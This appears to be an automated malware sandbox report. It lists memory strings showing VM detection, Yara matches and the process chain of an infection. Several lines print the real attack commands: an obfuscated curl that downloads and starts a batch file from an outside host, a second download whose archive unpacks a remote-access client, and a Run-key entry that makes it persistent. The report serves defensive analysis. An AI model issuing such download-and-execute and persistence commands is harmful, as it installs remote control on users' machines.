Source: explorer.exe, 00000014.00000003.2018164212.000000001031B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: TCCTL32.DLL.31.dr Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008393000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000000.00000003.1775422383.0000742403BB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: explorer.exe, 00000014.00000003.2021431230.000000000841F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}icense-Show
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000014.00000003.1920742592.00000000083B8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTnaVMWare
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: curl.exe, 0000001B.00000003.1453761095.000001D085104000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1475957554.0000020082825000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000014.00000000.1337084127.00000000081F1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWUSm32\DriverStore\en-GB\mshdc.inf_loc
Source: explorer.exe, 00000014.00000003.2021431230.0000000008432000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00%
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: osk.exe, 00000013.00000003.2248404527.000002ED5F2A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmcI
Source: TCCTL32.DLL.31.dr Binary or memory string: VMWare
Source: explorer.exe, 00000014.00000003.2018164212.000000001031B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@#
Source: explorer.exe, 00000014.00000000.1345005602.000000000BFE4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000014.00000000.1327863404.0000000006BE8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000CJ
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000S
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000014.00000003.2021431230.000000000841F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Dire\client32.exe "C:\Users\user\AppData\Roaming\Dire\client32.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f
Source: PCICL32.DLL.31.dr Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000014.00000003.2021431230.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2039234356.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.0000000008519000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp, PCICL32.DLL.31.dr Binary or memory string: Progman
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanH9
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tar.exe Queries volume information: C:\Users\user\AppData\Roaming\gety.zip VolumeInformation
Source: C:\Windows\System32\tar.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Windows\System32\tar.exe Queries volume information: C:\Users\user VolumeInformation
Source: C:\Windows\System32\tar.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Windows\System32\tar.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Windows\System32\tar.exe Queries volume information: C:\Users\user\AppData\Roaming\Dire VolumeInformation
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Queries volume information: C:\ VolumeInformation
Source: Yara match File source: 32.0.client32.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1486224969.00000000007CF000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: client32.exe PID: 3988, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Dire\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Dire\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Dire\client32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL, type: DROPPED